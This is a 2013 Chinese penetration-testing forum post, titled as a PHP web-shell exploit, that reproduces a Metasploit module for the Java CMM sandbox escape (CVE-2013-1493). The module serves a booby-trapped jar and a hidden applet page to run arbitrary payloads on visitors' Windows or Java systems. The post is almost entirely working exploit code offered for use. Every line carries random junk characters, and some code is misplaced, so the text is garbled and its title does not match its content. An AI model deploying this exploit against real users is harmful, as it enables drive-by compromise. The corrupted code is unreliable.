中国网络渗透测试联盟

标题: STUNSHELL PHP Web Shell远程执行代码 [打印本页]

作者: admin    时间: 2013-4-4 17:31
标题: STUNSHELL PHP Web Shell远程执行代码
##
( q5 f+ u. j' a8 A# e8 ~* [! k0 `- c$ d# x9 b! w
# This file is part of the Metasploit Framework and may be subject to
7 G6 \2 j+ l% `# E( s/ F( j# redistribution and commercial restrictions. Please see the Metasploit, x/ T0 t9 ]- o+ ^) N6 x% S
# web site for more information on licensing and terms of use.) r0 ~8 H: w; M" D
# http://metasploit.com/  F$ I0 n* j4 s. S& x5 l; a
##
1 U! }: }4 X* N4 V: p) grequire ‘msf/core’
$ `, _+ B* ]7 Trequire ‘rex’
4 t4 C* v1 ?* o1 \. j* e0 Yclass Metasploit3 < Msf::Exploit::Remote
/ o" R9 \' j0 H! f" m3 t9 K, X* cRank = NormalRanking- a2 y4 f) \# p8 i
include Msf::Exploit::Remote::HttpServer::HTML! d  I) R# R; w2 }5 y: G. t5 T
include Msf::Exploit::EXE4 Y& O) k! J2 d1 t- b& _
include Msf::Exploit::Remote::BrowserAutopwn8 f. P7 B6 G+ w' X$ r) S- g  q# G
autopwn_info({ :javascript => false })
7 `$ }( R% J& t6 i: xdef initialize( info = {} )
$ c# e6 y$ {  @% t: ^super( update_info( info,
. G( |. N9 U8 n' P, T* w& |‘Name’ => ‘Java CMM Remote Code Execution’,( z( _/ Q' S0 S. F
‘Description’ => %q{6 j; f; |+ J: g% h' o- N; I' ^  z9 @
This module abuses the Color Management classes from a Java Applet to run* T+ L- L# }% b2 J9 e/ G2 Y
arbitrary Java code outside of the sandbox as exploited in the wild in February
! H( W' m. G' {; z0 Pand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u411 \1 A: i  Q6 h: P( x! I
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1$ b. {" @% X) Q1 e2 S' P
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
* j6 i' @# X, T, N& Z. C3 ^warning in order to run the malicious applet.
3 ~) S; P. ~0 ]/ S# [6 K! M. o},
7 U/ h+ k( K& e# G‘License’ => MSF_LICENSE,/ Q# [0 o$ }8 [0 \$ q
‘Author’ =>
# K6 W  |* j; P' @8 i' a'Unknown', # Vulnerability discovery and Exploit
, O4 O) X- l3 ^1 e' D5 k'juan vazquez' # Metasploit module (just ported the published exploit)+ d: ]: E7 C2 a1 n! _! c
],
3 N; ]6 @/ K5 V& R- b! T‘References’ =>1 \/ Q" G4 N4 x5 P- D& o
[  g, j% Q+ v6 ]& F6 a( R
[ 'CVE', '2013-1493' ],5 n" L* R+ g: {/ O1 g, u# @- [
[ 'OSVDB', '90737' ],1 a& x3 o8 t0 g4 Y( O$ e
[ 'BID', '58238' ],
7 F) S! s; F( Q0 O% h3 H2 N9 Z[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],# k/ B0 _5 e0 G5 S
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],6 W. F* f( M! Z
[ 'URL', 'http://pastie.org/pastes/6581034' ]) _% e8 M" U" ?* K; g" ]& x, R( H
],
2 w* k9 ~; T- E: o! A" N  @‘Platform’ => [ 'win', 'java' ],+ l/ H8 S% p: r3 x
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },5 B# _" O0 P3 V7 Q& E
‘Targets’ =>
& J7 m4 ?& k# h) w6 l1 z[
& \/ H( O' J% S, K9 f8 r- [* K[ 'Generic (Java Payload)',1 b) H) m% p% c. X: e  [' w
{
7 D3 ?  o: g" r  Y0 I; Y'Platform' => 'java',0 S3 Q- l6 h* a
'Arch' => ARCH_JAVA6 j; ^9 D: x% M: ^9 z4 b
}
; r( r3 q2 h4 X- {; T! C0 s],2 L4 H8 \2 o6 O, Z- K( m# x9 ~' d
[ 'Windows x86 (Native Payload)',
8 Z" o6 C% V7 ?. l{
! G2 Y$ I; F- u8 L'Platform' => 'win',# z" [/ D3 H# L
'Arch' => ARCH_X86' G$ Y+ N; {4 e7 H* ~' n
}
3 U- A- c" a/ y. M0 ]- C0 T+ h]
, V/ T5 D9 K2 M- c: o" B, `],9 V9 j- O" ^) m
‘‘DisclosureDate’ => ‘Mar 01 2013′
) e& e$ T4 K5 ~" s))! m: M! i, i' C3 x, v1 Y  z+ V- W
end" {. D( ?0 Q2 {% L. J% z$ i$ v
def setup( q/ X7 e' [0 n1 ~) Z7 _+ ]
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
- A# x  R" J( W- X* g* w1 }@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
' m: b: @, T( P9 a# T  N4 G+ p2 J3 X9 ^path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
  [2 l" B& N) k9 e3 \6 |@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 t2 g6 y4 Y% zpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
& c1 v6 L* \; Z$ Q@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
) w/ O. O# [  N% O% apath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)2 i/ [' s* I; D# N& T
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
- K1 @1 q" p# N  u2 g@init_class_name = rand_text_alpha(“Init”.length)! I5 H+ P' m+ P
@init_class.gsub!(“Init”, @init_class_name)
: `" r5 j4 _( s6 J1 K& W+ D/ ~& zsuper
7 o9 x2 l, @+ K  {" h3 Iend, m: `; w8 G' P+ d# R5 H
def on_request_uri(cli, request)
4 y4 H4 V* f8 q' e6 Hprint_status(“handling request for #{request.uri}”)
& S' y5 `3 p  e+ i7 O/ kcase request.uri/ \3 e& N$ j4 w4 W/ M
when /\.jar$/i* e: J; O  f8 B7 Q$ H6 a
jar = payload.encoded_jar6 X, m! F& \( ~: ?: W/ ~+ |. R& g
jar.add_file(“#{@init_class_name}.class”, @init_class)) J, n# \- u- t- m1 A4 u. i
jar.add_file(“Leak.class”, @leak_class)
0 z( Z% h* W) k4 K! J! g" Ejar.add_file(“MyBufferedImage.class”, @buffered_image_class)0 F# }: o3 Q% C& t
jar.add_file(“MyColorSpace.class”, @color_space_class)
' F2 c6 Z7 w- n2 l7 ~: b/ CDefaultTarget’ => 1,7 W& j& d( j0 _( q: g& w1 c3 j! ^/ o
metasploit_str = rand_text_alpha(“metasploit”.length)& x: y+ }. W' `. ^2 n3 B
payload_str = rand_text_alpha(“payload”.length)( z! c8 R/ [2 d
jar.entries.each { |entry|
# z$ R; @# M6 W1 @  T0 kentry.name.gsub!(“metasploit”, metasploit_str)
  I! R0 G0 z& j& ^! C' kentry.name.gsub!(“Payload”, payload_str)
! p3 X$ c1 {+ `1 z0 |. Ventry.data = entry.data.gsub(“metasploit”, metasploit_str)8 R5 E: _% X- k* M* \/ o* P* F
entry.data = entry.data.gsub(“Payload”, payload_str)
5 C8 R3 e# z& f: p9 u7 E}8 d! P- d0 ]' A' }
jar.build_manifest" {9 |$ d! ], q* ?: j3 c
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })4 ?$ M+ ~1 H2 ?  f6 v$ U/ a
when /\/$/
- e- D# I2 p- I5 E+ G7 ^1 hpayload = regenerate_payload(cli)
  ^2 }2 y, ^; F. `6 Cif not payload  W$ X/ d, u8 w* G1 m
print_error(“Failed to generate the payload.”)6 b0 D4 e, I4 I+ M$ L- c1 x$ j, e
send_not_found(cli)9 |  e; N% Z* M+ w1 y& U5 x
return
2 Y2 l5 T9 H  B, Z! B3 e/ Pend
, W* V: b4 `* R( D% J' }9 Hsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })+ x- O$ I/ ^) U; Z& |& e& x
else
/ t- Z# V5 c' \! h% ~7 @# |" ?! Ssend_redirect(cli, get_resource() + ‘/’, ”)- l- r* y# o& ~
end, b4 |5 o$ L) L& M3 ]4 |
end/ U3 s8 @1 S) k& S8 F5 p$ L% _
def generate_html
) N' q+ |) o" H5 P0 B. lhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|: e1 q& S: }' ~  A
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|+ H/ ?+ c/ }  u
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
3 J+ q/ b0 o! h. X/ R8 S' Zhtml += %Q|</applet></body></html>|
. y( Y" A, s+ Zreturn html' O: [3 G+ a) x7 ^6 r7 ?' a- J1 T
end0 E/ w( \0 _( M5 T- z" r
end
, ]. h! F: g8 W; i. w9 V* a# ?$ Pend
1 u. J+ Z  P. V




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2